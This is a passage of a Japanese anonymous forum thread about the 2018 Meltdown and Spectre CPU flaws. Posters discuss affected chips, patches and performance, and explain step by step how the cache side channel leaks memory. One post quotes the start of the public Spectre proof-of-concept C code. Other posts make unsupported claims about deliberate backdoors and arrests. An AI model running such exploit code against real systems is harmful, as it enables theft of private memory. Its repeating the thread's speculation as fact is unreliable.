借金してまで買ったものが粗悪設計者で全世界に迷惑をかけるものをばら撒いてたというとんでもない状況だけどな
A75もMeltdownの影響を受けることがわかっている以上、もうARMは終わりと岩ざるを得ない
利益98%減した年の翌年にまともに動作する設計を出せないファブレス半導体メーカーなんて、一体何で食ってけというのか snapdragonもだめなのかな?
元はARMだっけ? >>255
スナドラもAppleのAxxもARMで、とくに高性能を売りにして投機的実行機能を持ってたやつはMeltdownバリアント3aに該当してる可能性が非常に高い
実際スナドラ620や810は直撃、AppleのAxxもダメだったからiOS11.2で修正が入ってる >>256
そかぁ、ありがと
古いし買い替えなきゃだろうけど、どれ買えばいいんだよ(TдT) >>202
>>210
>>223
なんか思ったけどやっぱ儲かってる時って周り見えてないのかね?
日本の場合も中国に工場作ったらコスト削減できて儲かるぞ〜行け〜みたいな
まったく同じ轍を踏むとかなんかそういうゾーンみたいなのがあるのかなw >>259
日本に限らず西欧先進国も通った道だからな。 >>261
投機的実行をしないチップならそもそも問題の原因がない
逆に言えば高性能を目指して投機的実行を実装したチップはみんな引っかかる
これはまさに「Intelだけに限らない」ことで、
ARMのA15、A57、A72、A75など広範囲に影響範囲が広がっている スナドラ210とかCortex A9も大丈夫なのかし >>260
利益を生むためには宿命みたいなもんか・・・
中国資本の半導体工場が今年後半からDDR4量産始めるけどどうなるんだが
https://news.mynavi.jp/article/20170804-a262/
>>計画がされている半導体のファブは、合計17個
>>これら半導体メモリ製造3社は、いずれも現在巨額を投じてファブを建設中で、2018年後半から2019年の量産開始を予定している。
これらが本格稼働すれば、半導体メモリの世界規模の需給バランスが大きく崩れる可能性が高い。
https://www.jetro.go.jp/biz/sensor/areareports/2017/c822ee86dd27095f.html
>>米国のバーンスタイン・リサーチ社によれば、これらの政府系ファンドが半導体プロジェクトすべてに資金面で支援を行った場合、
2020年までに中国国内のチップ生産量は、世界全体の需要を25%も超過するだろうと指摘している。
とりあえず今回の騒動で買い替えや一新しようとしてる人は待ちだな
下手したら本当に2018年の後半は半導体系パーツは暴落する恐れあり 投機実行全般が悪みたいになってるけど、どういう理屈?
特権状態かどうかの判定が確定する前に特権状態でしかアクセスできない資源に
投機実行している命令が触れてしまうとか? 詳しく知らないけど、特権状態の投機的実行で取り込まれたデータを、たまたま直後に切り替わった通常ソフトが読めるということかなぁ?
実際にそんなタイミングをどうやって知るのか分からないし、もっと何かあるのかも。 >>267
スーパーバイザーモードのOSからユーザーモードの通常ソフトへの切り替えには
コンテキストスイッチだっけ?プログラムの状態保存と復元が必要だから
パイプライン処理で連続的に投機的実行されないような気がするけどなぁ。
パイプラインにつっこまれてるのは同一プロセス(スレッドは別かもしれんが)だとは思う。 インテル
「い・・・いやだ・・・・・・
一人で逝くのは・・・もう一人は・・・・・・」
ARM「!!!」
インテル
「いやだ!」
「ARM・・・おまえも・・・」 GoogleがIntelチップにおいてMeltdownへの修正をしても大きな性能低下は起きない、無視できる程度だと明確に発表
ttp://bgr.com/2018/01/05/meltdown-spectre-fix-google-patch-performance/
あーあ、Intel叩きであたかも大幅に性能が低下するようなガセネタを大量にばら撒いてた連中はこれで風説の流布で逮捕確定だな
今回の件は株価操縦を狙った悪意ある情報リークまで取り沙汰されてるから各国警察も容赦ない
Intel叩きしてた連中の書き込みは徹底的に調べ上げられるだろうな Googleのお墨付きを得たAMD
これで安心してみんなZENを買えるね なるほどキチガイアンチIntelの腐った思考は本当に気持ち悪いね
まともな人はIntel一択だな >>274
よう現実を否定してる末期キチガイアンチインテル サイドチャネル攻撃って何?
直接読めてはいけないデータを読むわけじゃないの? メインフレーム系以外では過去から言われてた事だよ。 >>277
今のCPUが高速処理可能な理由はOSの動作要求に特化しているから。次に必要な計算結果を先回りして複数用意し、
本当に必要な奴を選択する方法を採っている。その時、情報の重要性によって取り捨てにもランク付けする必要がある
のだが、全部一様に一時保管してしまっている。保管中の本来不必要な情報を一定時間監視し続けていれば、PC内の
根幹情報が拾えてしまう。これが、今回大問題となっている部分なんだ。
AMDにも同様の問題は存在するが、チップの仕様上どうにもならないのがIntel、ARMというわけ。先に挙げた保管中の
不必要な情報部分にブラインドをしておいてから、必要な情報を取り出す仕掛けを追加することになるので、計算結果の
先取りが非常に遅くなるのだ。
数日前に誰かが面白い例えをしていた。銭湯に行って番台を通る都度に、女湯・男湯のカーテンを開け閉めするような
ものだと。元々両方あるのに、入って見られるのは片側のみってコト。しかも、内部は入る都度に変わる。 もう >>271 でIntel環境でも性能低下なしと確定したからなぁ
AMDをわざわざ使う必要もない それは速度低下がないという意味ではありません。また、Googleはいかなる保証することはできません
「とは、特定のパフォーマンスや運用への影響を。」先日は説明したレポートのパフォーマンススローダウンの
どのような修正が実施されているの後にさまざまなシステムに期待することができますが。
なるほどわからん お墨付きしてねぇじゃねぇか アプリごとにやってみないことには俺にも解らんいうとるやんけ >>266
参考程度で俺の理解を述べると以下の通り。
(前提知識、共通理解)
・分岐予測!とは、格好いい名前で未来予測するスーパーな機能な語感があるが、
→ 分岐といっても多分岐なんかない! 通常あるのは、二つの分岐だけ(true/false)
→ 実際の所は、分岐命令の解決を行う前に、とりま両方の命令シーケンスを先行実施する機能を指す
→ 分岐命令の計算結果(=減算とフラグレジスタの状態検査)が出た時には、先行実施していた二つの内の不要な方を破棄する
(要点)
・でも、先行実施の際に、L1にロードされたキャッシュを破棄しない (→ spectreを理解する肝)
・あと、特権レベルが異なる命令も同時に論理コアで並列実行する (→ meltdownを理解する肝の1)
・L1キャッシュにメインメモリの内容を(ページ単位で)ロードする場合とキャッシュにヒットした場合では、処理速度が異なる(→ meltdown理解の肝2)
・meltdownは、このキャッシュヒットの差異による時間差を計測(=これがサイドチャネル攻撃)することでメモリ内容を推定する
で本文
・論理コアは特権レベルに関係なく同列に並列実行する
・プロセッサのL1キャッシュは、特権レベルに関係なく必要に応じてキャッシュにロードされる
★アウトオブオーダーなり分岐予測における命令実行において、L1キャッシュへのロードは、特権レベルに無関係に実行される
特権レベルに差が生じる場合に、下位の命令ストリームを止めるということを行ったり、
予測命令時に触ったL1キャッシュを破棄するなんかを行えば、予防できるようにみえるが、
これは高速処理を追求した「設計」だと俺は考えている。 俺の中では、欠陥なんかじゃない、と思っている。 パッチきても解決じゃなくて緩和らしいな
一気にダウンすると騒がれるから10%ずつダウンさせるんだろうか? >>284
最後三行への対策をしてしまってら、
高速化のための 「投機実行」 じゃ無くなってしまうもんなw こんな緩和策で対策したことにしてごまかす気だからな
https://www.mozilla.org/en-US/security/advisories/mfsa2018-01/
>The precision of performance.now() has been reduced from 5μs to 20μs,
>and the SharedArrayBuffer feature has been disabled because
>it can be used to construct a high-resolution timer. AMDなども影響あるとニュースにさえ流されているのだが?w i7なんかおかしい気がする
挙動不審
win10も同じ
絶対おかしい Windows Updateかけたら、Athlon 64 X2 のPCが
立ち上がらなくなってしまった。Windows7 32ビット版
修復して何とか回復したが、アップデートかけるとまた同じ症状
こまったもんだ 結局どこも確実的なことは言えないっていう振り出しに戻ったってだけ? 心配しなくても、貧乏人のキャッシュなんて誰も見ないよ・・・ >>284
うーん、どうもわからん。
論理コアがOSとユーザープロセス、ユーザープロセスア間を切り換える時、
コンテキストスイッチするから他のプログラムが並列実行されることはなさそうだけど。
(アウトオブオーダーや投機実行されているのは自分のプロセスの命令だけでは?)
異なる論理コアで実行されているOSや他プロセスの様子を共有L1キャッシュを眺めて
判断するってことならできそうだけど、ユーザーレベルではキャッシュの直触りは
できない?のだとすると他プロセスの動向を知りえないような気がするが サイドチャネル攻撃の脆弱性って、変な喩えを使えば、量子論の不確定性原理めいた部分があるからな。
或いは、去年の流行語「悪魔の証明」という部分がある。
このサイドチャネル攻撃(=悪魔の証明)に対抗する理論を立てるには、その実行に必要な「物理時間」や「現実実現性」で抗うしかない。
SSLやTLSが公然に信頼を獲得したのは、
「現実的な実現性が天文学的な総時間と、情報のライフタイムで計った時に非現実的である」、
という点が肝になっているからね。
最適手法、既知の最合理手法で攻撃した場合でも攻撃が成功した時点では意味消失している、ということが根底にある。
つまり確信を持って安全と言い切るには、まだ時間が必要だと思う。 >>295
あなたの考え通りなのが AMD
あなたの考えと違うのが Intel >>292
アムド潰し・・・
はじまったな・・・ // / / ああ・・・
_ _ ノ ,!__,ノ-<`____ `ヾ三ミ :::::::::::
_ノ,´'´二 ーヽ_ 込{、Y´ 「 ̄ ̄`¨゙`ド=,=/`ヽ::::
ゞY"⌒Z彡ミヽゝ { }'¨ゝ____ ノ u / } :i )'ヽ |:::
〈ィ≦ _ }j^〉 r' ソ 、 ,´ ! .:i '/_ノ::::
厶` ′゙へ_f´ `┐` ′ | / .:i_/ヽ::::::
キ=, //へ_ ヒ..___ ,/ .::i レヘ:
'ーっt'´ / ̄`¨`ーハ` ̄ __,ノ ..:::i
,ハ_ / //,_ __,,ィ''" ...::::,ツ | ,イ´
/ 『7 ,' ィ".::" ̄´ _ :::::::::r''" | / /
/ {{'" l ツ,___ _ ::::::::ィ'" ,レ′/
ハ |! {{ラ 、ノ 二ニ.{  ̄´ ヽ、 / / >>296
天文学的な時間ってのは必然的にヒットさせるためには天文学的時間が必要ってだけで、
たまたま偶然秘密鍵がヒットして情報つつぬけなんて事態は対象外のいいかただからなぁ。
宝くじを「当てる」ことは不可能だが「当たる」人はいるわけで、
当てることができないから安全は正しいか?なんてことを言いだすと安全神話が必要になっちゃうけど >>295
「普通に使っている場合にmeltdownの前提条件が成立するのは難しいじゃね?」
と、いう疑問かな〜って思ったけど、俺も、そうじゃないかな〜と直感では感じている。
Project Zeroが参考文献みたいに張ったリンク先の論文を読む限りだと、
前提条件として、プロセッサに高負荷が掛かった状態において発生するような事が書いてあった。
だから、パーソナルユースの不安よりも、仮想マシンを並列するクラウドや
ユーザプロセスを共有し、スレッドでクライアントを捌くウェブサーバみたいなシーンでの危険性が囁かれるのかと。
でも、クライアントシーンでも(我々の宿敵であり、脅威であり、Telemetryの守護者たる)Windows Updateなんかが怖い。
と、有り得ないようなことを囁いてみる、テスト。
「だから」以降は、信じるなよ。 分岐命令の両方を実行してて、確定した時点で片方を捨てるってのはネットバーストの仕様であって、
すべてのプロセッサがそうなってる訳では無いじゃないの? VMだのVPSだの使ってる奴が何人いるかと問いたいところだがw 全てじゃないと思うよ。
AMDで否定されたプロセッサがあるように、それを実施していないプロセッサもある。
それが「設計」な訳だし。
安全係数、耐久寿命、生産性、処理速度、信頼性、目的合理性
アンビバレントなそれらを秤に掛けて、その要求仕様に求められるものを定めるのが設計というもの。
安全に倒せば、性能は落ち、生産性とロジックの複雑性が増し、消費電力が減り、経過時間が労働報酬の上昇を産み、
対価を支払うことが企業のパフォーマンスを劣化させ、経営者と資本家の報酬を減らすプレッシャが労働者の報酬と社会報償へ転嫁される。ってね windows hostのvirtual boxにlinux guestを入れてますが、なにか? メルトダウンはともかくスペクトルの方は投機的実行してればどれでも可能性ありというのがなんともわからん。
投機的実行自体が安全なものではないとなってしまうと、
コンピュータアーキテクチャはとんでもなく後退させられることになるような気が駿河 でも、この問題は面白いな。 ゲスな表現をすれば興味深い。
若しかすると、この事件の顛末から複雑性(=攻撃の成功性)の低さが、
セキュリティの評価基準として認められる流れになる「かも」しれない。 実名は避けるが、俺が個人的に知り合ったT********G*********さんが語っていた
「設計というのは難しい」
という言葉が、↑を書いて整理しながら、ようやっと,、その片鱗に触れられたような気がした。
若い頃にすっごいプレッシャーを掛けられて追い詰められたけど、ほんの少しだけ見えた気がする。
有り難うございます。 プレッシャを掛けられた時は、尻の穴がしぼむ思いをして震えが上がったけどなw >>312
その世代なら対処されるだろうから大丈夫でしょ。
俺の現役マシンは、Core i5-3xxxxとCore i5-4xxxxとCore i3-xxx(第一世代)だぞw
どうみても切り捨てられる世代wwT-T w >>314
遅くなっても「安全」な世代かな。
俺は、もっと早く、もっと早く、もっとは・や・く! はよーーー!を好むけど
非現実的な「刹那」の単位クロック数でレスポンスして欲しいの snapdragon800 は krait400という独自設計のやつみたいだから大丈夫みたいだ ゲーム機のCPUは大丈夫なんかね
普及台数がでかいだけに 仮想マシンなんか関係ないユーザーには
ブラウザの緩和策ってのがCPU未対策環境でどのくらい有効なのか知りたいところ
Googleに主要ブラウザのテストやって欲しいわ メルトダウン対策しないつもり?
チャレンジャーだな >>123
一般人で、CPU 使用率100%近くつかってるのって、ゲーマー位だろ。 で何?
Windowsて更新プログラム用意すんの? インテルのサイトに行って更新プログラム配布とかいう流れになんの?
俺達はなにすればいいの? 全部のコンピュータが対象なら相対的に個人のリスクは減るからどうでもいいわ
ハッカーだって実りの大きいものから狙っていくだろうし、そういう事件が報道されてからだな まあ投機的実行だから、比較的新しいCPUがアウトなんだろうな
投機的実行はまだ進んではいけない先の処理まで実行してパフォを上げる手法
オンラインバンクのページを開いたとしよう、クッキーで自動的にIDやパスがセットされる
このままだと、ログインのボタンを押さない限りIDもパソワードも読み取られることはないが
投機的実行をするCPUでは、IDやパスワードが入った送信情報がつくられてしまう
この段階で悪意のあるプログラムがバックグラウンドで動いていれば、それがこの送信情報をゲットでき
IDやパスワードが悪意の第三者の手に渡ってしまう
ログインボタンを押さずただオンライバンクのページを開いただけなのに
買い物は現金支払い、お金は通帳とキャッシュカードで入出金が、賢い人間の行動wwwwww >>328
投機的実行と言っても、パイプラインに空きが出来ない様にするくらいだろ。
そのレベルならアプリだけの問題。 pen2のマシン使ってるわいの勝ちって事でいいの? インテル買っちゃったなら勧めた馬鹿を恨みましょう。そうです、あなたには責任がありません。物知り顔で勧めた馬鹿が全て悪いのです。 まったく詳しくないけど
AMD製品を積んでた人が大勝利なのです? >>323
インテルは対処不能なんだよ
俺のパソコンをハッカーさんが
狙わないでと祈るしかできない 投機的実行時に保護されたメモリを読めるというのは
明らかに高速化のためにセキュリティを犠牲にしている
わざわざ通常実行時と異なる処理をしているわけだからね
脆弱性を仕込むために意図的に行われたと疑われてもしょうがない
インテルは問題を把握してからAMDのCPUでも再現させようと必死だっただろうね
それでも再現できないんだから今現在の選択肢としてはAMDに買い替える道しかないだろう つまりインテルはチートでAMDよりCPUの性能がいいと言い張ってただけだったと 保護されたメモリを「読める」わけじゃなくて
読み込み時間の差から推測出来るってのが良く分からない >>323
windows updateするかPCを窓から投げ捨てるか サイドチャネル攻撃を身近な物で例えた例を見つけた
サイドチャネル攻撃への耐性を備えた超低消費電力プロセッサ - 日本シノプシスホームページ - Synopsys
https://www.synopsys.com/apps/japan/today-tomorrow/articles/dwtb_arc_sem.html
身近な例として、誰にも気付かれないように数日間自宅を留守にする場合を考えてみましょう。
外出することを誰にも告げず、人目につかない深夜に荷物を車に積み込み、室内の照明をいくつかつけたまま出かけたとします。
それでも、郵便受けに新聞がたまっていたり、いつも同じ照明がついていたり、ふだんはよく鳴く犬が静かであったりすると、そのことを手がかりに近所の人や犯罪者は窓から室内をのぞき込んだり建物に侵入しなくてもその家が留守であると知ることができます。
もちろんこれは非常に単純な例えであり、実際のサイドチャネル攻撃はもっと複雑ですが、基本的な考え方は似ています。 MSがWinアップデートで全部速度さげてきたりしてな >>337
30%でも追いつけてないぞ…ryzenより前は >>338
君の行動で自分の部屋のエロ本の在り処が母ちゃんに予測されるということ。
常にエロ本の位置を変更したとしても追える。
めっちゃやばい パッチあててベンチスコア見てみたけどなんも変わってないな
AMDだからけ? AMDすごいな
今回は偶然なのか、最初っから不確かな技術には手を出さない経営方針だったのか、そろそろはっきりさせろ
偶然だったならよかったね、経営方針だったのならお株が上がる >>271 を無視してるアンチインテルのレスはすべて風説の流布の犯罪行為だからな Windows10が勝手に再起動したんだけど・・・ひょっとして、このアップデート?
もしそうなら3割落ちてるかどうかベンチ取ってみる。w >>347
捏造ネガキャン垂れ流すだけの馬鹿はわざわざレスしなくていいぞ >>347
2018 年 1 月 4 日 ? KB4056892 (OS ビルド 16299.192)
↑
これだろ
俺も昨日、勝手に再起動されてたから「あれっ」って思ったけど内容みたら全く関係ないな >>342
いや30%も下がればさすがのFXもi3くらいには勝てるだろ? 実際にはそんなに性能下がることがないので考えるだけ無駄 FXでも5000円のセレロンでも、体感速度は十二分に快適だろうけどな。
ベンチ走らせなければ。 WindowsUpdateしたら立ち上がらなくなってしまった(T_T) これがサイドチャネル攻撃の実態
簡単に言うとプログラムの通ったルートがあるデータがキャッシュに入ってるかどうかだけでバレて、
それを元に入ってるデータが推測される
前提条件として、データの推測を許すようなパターンのコードがターゲットになるアプリケーションに存在してる必要がある
ブラウザーのJavaScriptエンジンはかなり巨大なプログラムだから
何処かにはそんなコードもあるだろう
データXを読みたいとして、
変数に普通は読めないデータXのアドレスを入れ、投機的実行で読まれるように仕向ける。
↓
投機的実行時は、通常は読めないデータXも読まれるが、処理の影響は分岐予測が外れると無かったことになる。しかし、その時メインメモリから読みこまれたデータはキャッシュに入った状態になる
↓
違うデータYを読み出す。アクセス時間の差から、データYはキャッシュに入ってる事が分かる
↓
データYが読まれるのはプログラムがこのルートを通った場合のみ
↓
そのルートを通るのはデータXの先頭ビットが1のときだけ >>345
偶然でも経営でもなく、ジム·ケラーの手腕でしょ >>292
パッチにバグがあるようだからK8CPU対策で配り直しっぽいね >>320
メルトダウン対策(Winのパッチ)はEdgeとIEの更新入ってるからやるけど >>361
更にとばっちりを受けてるのは対応に追われるマザーボードメーカーだな Googleの発表とか見ても一般ユーザーが関係ありそうなのがブラウザしかないし
実際ソフトウェア各社Microsoft(Edge,IE) Mozilla(Firefox) Google(Chrome) Apple(Safari)
の発表もブラウザの緩和策(mitigation)が中心になってるのに
技術に明るい人ですらウイルスがどうのってちょっとずれた事言ってるのは何なんだ AMDのCPUにも影響あるって散々報道されてるのに
なんで一所懸命無い事にしてるの? >>364
ウィルスが脆弱性を利用することは十分考えられる
なんで関係ないと思っているのか 守られた環境から外を読むための攻撃手法の話題で
少なくとも"守られた環境"で実行するのではないウイルスはこれには関係ないよ 言ってる意味が分からん
まさかWebブラウザ経由じゃないと脆弱性が突けないと思ってるのか? 一般ユーザーが関係ありそうなのがって言ってる
ウイルスがこの攻撃を利用するって例えばどんな場面? パンツの中身が見えてしまうだけで、
パンツの中に手を突っ込めるようになったわけじゃない ウィルスってのは悪意を持って実行されるプログラムの総称だからね
ローカルPC実行される場面の全てだよ
あんたが普段使ってるフリーソフトが更新されたときに脆弱性を突いたコードが紛れ込む可能性もある >>366
大穴あいてるintelと同列にするなよ(´・ω・`) >>358
Phenom Win10 64 の場合は大丈夫だった。違うのかな 仮に30%遅かったとしても倍以上遅いブルドーザー系よりは速いけどなwwwww Excavatorなら60%ぐらいじゃね
初期のBulldozerコアだと40%あればいいけど Excavatorは1M/2CでK10やConroe相当
クロックも高めだからNehalem相手にも戦える まで減らしたから改良で2の演算ユニットで3相当の性能を出すのが戻すのが大変だった K10の3GHzとパイルドライバーの3.8GHzが同じくらいだよ。 FX-9590 8コア 定格5GHz TDP220WというレジェンドCPU 組み立ててから相当年月経っているけど、いまだに現役でバリバリ
https://i.imgur.com/VvRofi2.jpg インテルはみんなやってるんだもん。僕だけじゃないもん。の精神で
自分のところが集中的に攻められるのを軽減したい思惑をひしひしと感じる
つーかインテルは11月にもIntelManagementEngineで脆弱性問題出てるじゃん
基本的にインテルはクソだろ >>391
11年間放置していたからな
その言い訳はできんよ
https://marc.info/?l=openbsd-misc&m=118296441702631&w=2 Google「匂うぞ!だれかうんこもらしたな」
Intel「漏らしました‼でもAMD君も漏らしてます」
AMD「匂うけどオナラだけです身まででてません」
ってこと? ウィルスじゃなくてもアプリにユーザーのシステムやいろいろな本来秘匿すべき
情報を抜き取って定期的にどこかのサーバーに集積する機能が埋め込まれていたら
それを検出することができるのは、カルペンスキーぐらいのものだろう。
MSはUpdateの際にユーザーの情報を抜いて依頼されたら断れないところに
日常的に渡したりしているはず。 >>396
今度は、かわりにロシアになにか送るんじゃないか?
又はロシアから遠隔操作されるとか、個人でさえ出来たんだから国家はもっと秘匿してるかも。 >>29
POWERはIBMからPTFがでるとのコメントが出てたような PTFとは
Program temporary fix の略称。
IBM用語で、修正されたプログラム群を顧客に配布できるようにパッケージ化した物。 >>366
問題のレベルが全然違うのにIntelと同列にする忖度報道だな
AMDの場合Linuxで攻撃を受ける環境をわざわざ整えて4種の攻撃の内1種だけしか成立しない
しかも特に危険度の高いメルトダウンとは無縁 インテルはAMDのAMD64をそっくりパクってCore2 64ビットアークテクチャーを
急ごしらえしたはずだが、つまり論理回路はAMDのをリバースエンジニアリングした
わけではなかったんだということだね。
IBMのPowerは、インテルの石よりもハードの論理バグが少ないのじゃなかろうか。
インテルのCPUはあまりにも複雑な命令セットをサポートしているから、
設計が複雑になるのでは無いか?内部で使われているマイクロコードを非公開に
しているのも、なんだか怪しい気がする。マイクロコードの仕様が正確に分かると、
CPUのセキュリティ上の問題やバックドアが露見するので隠しているのかな? X86アーキテクチャを引きずってるから屋上屋を重ねて九龍城みたいになってるんだろうな
wintelの呪いがここへきて一気に噴出 >>404
命令セットは関係ないよ
MMXすら対応していないPentium Pro以降で発生するってIntelが発表しているんだから >>405
いや、ISAのせいじゃないだろ
後生大事にP6使ってるのが良くないと思うんですけど
原型残ってなくてもデコーダとか基礎仕様って触れないからな
バグの元になるから この前25万のThinkPad購入したのに...orz >>407
Pentium4
NetBurst復活させるしかないw >>14
俺なんか未使用のタラセレと815ママンあるし!
815 >>15
Googleが「セキュリティ上の脆弱性」を指摘してくれたんだって???
オッケーGoogleで家庭内の会話をすべてサーバーで処理して
個人情報の利用したがってて、GmailでスキャンしてたGoogleが???
悪い冗談だw lenovoなんて、スマホやタブレットまでIntel入ってるにしちゃったし。 これ、どの程度悪用される可能性があるのか(=現実的には無視していいのか)解らない。 >>415
Web見るだけで悪用される可能性があったため
現実的に無視できるレベルではない状況
このレベルは一般的にニュースになってユーザーの側も早期の対策をする必要がある状態 Athlon II X4で引っ張ってきたけどそろそろRyzenに行くか なんか新旧モデルの比較ですとかAMDとIntelの対抗モデルの
比較ですとか言っても通用しそうなレベルの性能低下だな >>416
JavaScript で特定のメモリを指定して読むなんて言語仕様的に無理そうだけど、
本当にそんな悪用が可能なのか、怪しい気がする。 >>420
おまえとか俺を含めて無理だと感じたとしても、
プログラミングを理解してるやつとかハッキングしてるやつにとってはGoogleの検証を見ただけで理解できるんだろうよ
だからこそ早急に手を打つ必要があった ( ゚∀゚)アハハ八八ノヽノヽノヽノ \ / \/ \ 電子立国笑わせおるwww
1987年 世界半導体売上ランキング 上位20社のうちの日本企業
1 NEC セミコンダクターズ
2 東芝セミコンダクター
3 日立 セミコンダクターズ
6 富士通 セミコンダクターズ
9 三菱電機 セミコンダクターズ
11 松下電器 セミコンダクターズ
13 三洋電機 セミコンダクターズ
17 沖電気半導体
18 シャープ セミコンダクターズ
19 ソニー セミコンダクターズ
2000年 世界半導体売上ランキング 上位20社のうちの日本企業
2 東芝セミコンダクター
5 NEC セミコンダクターズ
11 三菱電機 セミコンダクターズ
12 日立 セミコンダクターズ
15 富士通 セミコンダクターズ
17 松下電器 セミコンダクターズ
19 シャープ セミコンダクターズ
20 ソニー セミコンダクターズ
2008年 世界半導体売上ランキング 上位20社のうちの日本企業
3 東芝セミコンダクター
6 ルネサスエレクトロニクス
7 ソニー
11 NECセミコンダクターズ ←ルネサスと合併したよ
15 パナソニック ←半導体部門はタワージャズ(イスラエル)に売却されたよw
18 シャープエレクトロニクス ←会社潰れてフォックスコン(中華台湾)に買収されたよw
19 エルピーダメモリ ←会社潰れてマイクロン(米)に買収されたよw
20 ローム
2016年 世界半導体売上ランキング 上位20社のうちの日本企業
9 東芝セミコンダクター ←今度外資に売却されちゃうよwwwww
15 ソニー ←半導体と言ってもスマホ・デジカメのCMOSセンサ専用メーカーだよw
17 ルネサスエレクトロニクス ←潰れかけて産業革新機構やトヨタ自動車に助けてもらったよw win10の緊急アプデでアススのファンコンプログラム死んだ
うるさくてしかたないなんとかしろ Phenomなんだけど10のパッチあたってからプチフリが酷い。
結局どういう処理のパッチを当てたんだ? もしかしてパッチのせいなのか?
FXだけど音飛びするようになった >>425
CPUの処理が効率悪くなって爆熱になってるだけだったりして RyzenAPUでもモバイルでもいいからグラフィック内蔵のを早く出してけろ >>340
留守かどうかわかるのはどうでもええねん。
家に入れるかどうか(他の管理してるメモリに触れるかどうか)が問題なんで >>422
理解できるかどうかじゃなくて、システム領域を参照するポインターを設定できない
スクリプト言語じゃどうしようもないと思うんだけど、何か抜け道があるのかな。
グーグルも発表するならちゃんと実行可能なコードを公表して欲しいな。 まあ百歩譲ってユーザーの方は良いとして
鯖用のPCはどうなるの? >>404
仕様をマネしただけだし。
そもそもcore2の64bitは遅い >>432
ポインター設定してエラーが出るときには
CPU内部処理よりメインメモリーアクセスが遅いため先に?並列にメモリーアクセスするためとかなんとかで
もうキャッシュには入っているみたい
間違ってるかも >>376
今回の問題でsegv出る方が正しかった可能性がある
インテルがチートしてただけのように見える なんか偉そうに数名の名無しさんが語っているけど、
実際にこの件で悪意のあるプログラムを組んで実証出来ている人は居るの?
各自のCPUがどうなのか、
実際に検証プログラムで結果を知りたいと思ってるよね? Spectreの検証コードらしいーけど試していないけど
https://www.exploit-db.com/exploits/43427/
/*
EDB Note:
- https://spectreattack.com/
- https://spectreattack.com/spectre.pdf
- https://googleprojectzero.blogspot.co.at/2018/01/reading-privileged-memory-with-side.html
*/
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#ifdef _MSC_VER
#include <intrin.h> /* for rdtscp and clflush */
#pragma optimize("gt",on)
#else
#include <x86intrin.h> /* for rdtscp and clflush */
#endif
/********************************************************************
Victim code.
********************************************************************/
unsigned int array1_size = 16;
uint8_t unused1[64];
uint8_t array1[160] = { 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 };
uint8_t unused2[64];
uint8_t array2[256 * 512];
char *secret = "The Magic Words are Squeamish Ossifrage.";
uint8_t temp = 0; /* Used so compiler won’t optimize out victim_function() */
void victim_function(size_t x) {
if (x < array1_size) {
temp &= array2[array1[x] * 512];
}
}
/********************************************************************
Analysis code
********************************************************************/
#define CACHE_HIT_THRESHOLD (80) /* assume cache hit if time <= threshold */
/* Report best guess in value[0] and runner-up in value[1] */
void readMemoryByte(size_t malicious_x, uint8_t value[2], int score[2]) {
static int results[256];
int tries, i, j, k, mix_i, junk = 0;
size_t training_x, x;
register uint64_t time1, time2;
volatile uint8_t *addr;
for (i = 0; i < 256; i++)
results[i] = 0;
for (tries = 999; tries > 0; tries--) {
/* Flush array2[256*(0..255)] from cache */
for (i = 0; i < 256; i++)
_mm_clflush(&array2[i * 512]); >>「Androidプラットフォームについては、多くのAndroidデバイスで、この脆弱性を悪用するのは困難で、影響も限定的であることが確認されている」と述べている。
iPhone狙い撃ちされるな。 パスワード入力のプログラムから入力データーを全部リアルタイムで抜き取れる
のだとしたら、認証と共に、パスワードは抜き取られているんだな。
WindowsUpdateを口実にして、ユーザーのPCからメモリやHDDの中にある
データーを抜き取ってどこかに送って集約しているのと同じようなものだな。 >>444
そもそもAndroidはウィルスまみれだから、これ以上何かされてもワンオブゼムですよ。 もうどうしても
Intelだけじゃない!!他もなんだよ!!!
って必死だなw >>404
最初にAMD64をぱくったのはPrescott
但しIntel案で別の64Bit命令(Yamhill)を出す予定だったので
マイクロコード変更程度で対処できたから
初期のSocket478Prescottが犠牲になった程度で済んだし
LGA775版PrescottはAthlon64と比べて64Bitが遅いなんてことはなかった(むしろ64BitでHTTで性能が伸びたぐらい)
問題はTejasが2004年ごろに発熱問題で急きょ廃案になったので
PentiumMをベースに急遽2年で64Bit化したせいで
Micro-OPs Fusionの実装が不十分で
32Bit比べて64Bitが伸びないCoreMAが出来た 流石にCorei7で64Bit問題は修正が入ったし
64Bitモードと相性が良いHTTは再導入された ある程度ダイサイズを増やせればBulldozerみたいな実装にできたのに気づいて
更に32BitALUx2セットを2つに増やしたのがTejasだけど発熱で実現しなかった 13 Socket774 (ワッチョイ 9f6c-9YlK) 2018/01/07(日) 15:01:05.18 ID:GnevYt7w0
Phiも
き
た
ぁ
https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00088&languageid=en-fr
マジ全部だ、手持ちのIntel全滅のお知らせ >>408
まったく関係ないけど知ってる単語言ってみたかったん? 80 Socket774 (ササクッテロレ Spcf-p5eK) 2018/01/07(日) 16:11:46.91 ID:VytD/Gdhp
セキュリティ対策の性能低下でインテルユーザーの悲鳴が、、、
560 名前:Socket774 (ワッチョイ 9f67-SSJG)[sage] 投稿日:2018/01/07(日) 01:15:35.46 ID:JCrZUXG50 [1/2]
>>526
2倍どころじゃなくね?
アップデートで性能ほぼ半減してるでしょ、これ?
https://lh6.googleusercontent.com/MwzsHRXQLVbmJ3pusNuGwn0ZQVjo9h8nRJHJhIo4d3XFqbvUYCj8EPq5jV7zeVEEcHAkraNBesbbNDW_UAlIjvw-hZBd80rKt7ZYl35nBIcfCCVyRvW5V7M7KVejv9tvVBHfgSKr
713 名前:Socket774[sage] 投稿日:2018/01/07(日) 01:52:46.29 ID:bNSir7/X [2/5]
アップデート前はゲームやってても60℃+-5℃くらいだったのがアップデート後は70℃超えてる
714 名前:Socket774[sage] 投稿日:2018/01/07(日) 01:53:47.91 ID:bNSir7/X [3/5]
CPUの負荷が高くなってて熱い
定格なのにこれはきつい
715 名前:Socket774[sage] 投稿日:2018/01/07(日) 01:56:16.72 ID:H+FsuRpy
温度上がるのか きついな! >>454
第1世代が引っかかっていないところを見ると、第2世代で搭載されたブータブルCPUがアカンみたいだね 結局、Intel使ってる情弱一般人としては何をどうすればいいの?
自動でパッチがかかるのを待ってればいいだけ? >>458
XeonPhi初期はインオーダーでしょ デスクトップ向けVega GPU統合型Ryzenは99ドルで登場
https://pc.watch.impress.co.jp/docs/news/event/1099895.html
IntelユーザーにAMDから慈悲深い救いの手
Ryzenの新製品投入と値下げの発表がありました >>439
